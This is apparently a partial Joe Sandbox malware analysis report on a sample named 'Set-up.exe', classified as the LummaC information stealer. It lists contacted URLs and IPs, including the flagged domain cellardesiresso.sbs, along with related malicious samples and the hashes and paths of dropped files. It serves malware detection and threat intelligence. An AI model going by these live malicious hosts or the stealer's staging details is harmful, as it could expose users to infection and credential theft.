                                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSet-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://subca.ocsp-certum.com01PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                          high
                                                                                                                                          https://sectigo.com/CPS0DPU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                            high
                                                                                                                                            https://jrsoftware.org0PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                              high
                                                                                                                                              https://jrsoftware.org/PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                high
                                                                                                                                                http://crl.starfieldtech.com/repository/sfsroot.crl0PSet-up.exefalse
                                                                                                                                                  high
                                                                                                                                                  https://support.mozilla.org/products/firefoxgro.allSet-up.exe, 00000000.00000003.1833846923.00000000035E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://crl.trustwave.com/TWGCA.crl0nSet-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://sectigo.com/CPS0PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://repository.certum.pl/ctnca.cer09PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoSet-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://crl.securetrust.com/TWGCSCA_L1.crl0ySet-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                                                                                                                                              high
                                                                                                                                                              http://ocsp.thawte.com0Set-up.exefalse
                                                                                                                                                                high
                                                                                                                                                                https://www.certum.pl/CPS0PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://crl.certum.pl/cscasha2.crl0qPU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://cscasha2.ocsp-certum.com04PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://cellardesiresso.sbs/piwSet-up.exe, 00000000.00000003.1967884896.000000000066D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1855025285.000000000065D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://ac.ecosia.org/autocomplete?q=Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tPU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://crl.starfieldtech.com/repository/0Set-up.exefalse
                                                                                                                                                                            high
                                                                                                                                                                            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?Set-up.exe, 00000000.00000003.1832991094.00000000034F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://cellardesiresso.sbs/apiaySet-up.exe, 00000000.00000003.1967884896.0000000000671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                http://michaeluno.jp/BrightLib.exe, 00000024.00000002.2500367955.0000000003220000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000000.2455660146.0000000000AEE000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2500943004.00000000062A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://www.remobjects.com/psSet-up.exefalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.87.8 | cellardesiresso.sbs | United States | 13335 | CLOUDFLARENETUS | true
185.161.251.21 | cegu.shop | United Kingdom | 5089 | NTLGB | false
172.67.208.58 | klipvumisui.shop | United States | 13335 | CLOUDFLARENETUS | false
                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                      Analysis ID:1584522
                                                                                                                                                                                      Start date and time:2025-01-05 18:52:13 +01:00
                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                      Overall analysis duration:0h 9m 4s
                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                      Report type:full
                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                      Number of analysed new started processes analysed:38
                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                      Technologies:
                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                      Sample name:Set-up.exe
                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@59/13@3/3
                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                      • Successful, ratio: 33.3%
                                                                                                                                                                                      HCA Information:Failed
                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 20.109.210.53, 52.149.20.212, 13.107.246.45
                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                      • Execution Graph export aborted for target BrightLib.exe, PID 5796 because there are no executed function
                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 6736 because it is empty
                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
12:53:15 | API Interceptor | 9x Sleep call for process: Set-up.exe modified
12:54:21 | API Interceptor | 1x Sleep call for process: BrightLib.exe modified
                                                                                                                                                                                                                    • 172.67.178.174
                                                                                                                                                                                                                    setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 172.67.163.221
                                                                                                                                                                                                                    'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 104.21.32.1
                                                                                                                                                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.21.63
                                                                                                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 172.67.208.58
                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.90.109
                                                                                                                                                                                                                    Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 172.67.196.191
                                                                                                                                                                                                                    momo.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                    • 1.1.1.1
Dropped-file matches (Match, then each Associated Sample Name / URL with its Detection and Threat Name)
Match:C:\Users\user\AppData\Local\Temp\is-16TGC.tmp\_isetup\_isdecmp.dll
• 'Set-up.exe: malicious, LummaC
• Set-up.exe: malicious, LummaC
• SET_UP.exe: malicious, LummaC
• Setup.exe: malicious, LummaC
• Full_Setup.exe: malicious, LummaC
• Setup.exe: malicious, LummaC
• qnUFsmyxMm.exe: malicious, LummaC
• Active_Setup.exe: malicious, LummaC Stealer
• setup.exe: malicious, LummaC
• Set-up.exe: malicious, LummaC
Match:C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe
• 'Set-up.exe: malicious, LummaC
• Set-up.exe: malicious, LummaC
• SET_UP.exe: malicious, LummaC
• Setup.exe: malicious, LummaC
• Full_Setup.exe: malicious, LummaC
• Setup.exe: malicious, LummaC
• Active_Setup.exe: malicious, LummaC Stealer
• setup.exe: malicious, LummaC
• Set-up.exe: malicious, LummaC
• #Setup.exe: malicious, LummaC
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                                                                            Entropy (8bit):0.6599547231656377
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:NlllulYl:NllUY
                                                                                                                                                                                                                                                            MD5:AEA455AB1DC4223AE8D0C580ABD57501
                                                                                                                                                                                                                                                            SHA1:E9BCA6B2B40C42F260D129217C64BC1276131E33
                                                                                                                                                                                                                                                            SHA-256:4DA95C096E5D71402A51A01279983A5CE2190966584A9CC28F595955CA6BBA8D
                                                                                                                                                                                                                                                            SHA-512:F48087438F5B08ABF26BDC168BCB70D56FB2B08BB67B5D9CAEF74992EA4EBB734510FF9E828F2CB88DCE2D8861A459457FAC46C6DB40FF952CC3AE43C15E4661
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:@...e...........................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 3792 x 2093, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):6447207
                                                                                                                                                                                                                                                            Entropy (8bit):7.998441497232368
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:196608:sXKjzP/kSY5cPYsvASGkG9166F/KHaj2M:sXKjrMSY5yPoxv/XL
                                                                                                                                                                                                                                                            MD5:B0CB3F07919BEB69B342ED871C6511A9
                                                                                                                                                                                                                                                            SHA1:C23C0B4F9810D50ECB9EA186F57325C7B41DEEBE
                                                                                                                                                                                                                                                            SHA-256:AB4A4A40AA1C1129150AE38AA4F939EB22B4125F6BE8F12251D7C76239B3F8F3
                                                                                                                                                                                                                                                            SHA-512:75BD57701CAC2BE23A9A63AE414F0E019D7C69523F93B3CE6D908B76CC382D84AB1F1C2B085633D39A8E7294C1879601A1A3B03C5871BA0E35A345F559E06AA4
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                            Size (bytes):8767044
                                                                                                                                                                                                                                                            Entropy (8bit):7.960152326344281
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:196608:r7B6e1u5SqD6mOefSP01pbtDgGFN6sskirwDODi:roweOFCS8jbtM8N6sjYY
                                                                                                                                                                                                                                                            MD5:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                                                                            SHA1:60CD79359912A9069674CEE3C5C5982A9B01CE82
                                                                                                                                                                                                                                                            SHA-256:16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
                                                                                                                                                                                                                                                            SHA-512:7D2DF781963C8AC8A6F2A86EB95742AA26C932671D31DF8F09E334B2AF5E543EC3FB636ABFA4FB2512EC70126E1B9DB6DC7E9446A2A85BCA53EAFC790668964A
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                                                            • Filename: 'Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: SET_UP.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Full_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Active_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: #Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):35616
                                                                                                                                                                                                                                                            Entropy (8bit):6.953519176025623
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                                                                                            MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                                                                                            SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                                                                                            SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                                                                                            SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                                                            • Filename: 'Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: SET_UP.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Full_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: qnUFsmyxMm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Active_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp
                                                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):6144
                                                                                                                                                                                                                                                            Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):35616
                                                                                                                                                                                                                                                            Entropy (8bit):6.953519176025623
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                                                                                            MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                                                                                            SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                                                                                            SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                                                                                            SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp
                                                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):6144
                                                                                                                                                                                                                                                            Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3367424
                                                                                                                                                                                                                                                            Entropy (8bit):6.530011244733973
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                                                                                                                            MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                                                            SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                                                                                                                            SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                                                                                                                            SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):846325235
                                                                                                                                                                                                                                                            Entropy (8bit):0.13954043794048707
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                                                            SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                                                                                                                            SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                                                                                                                            SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
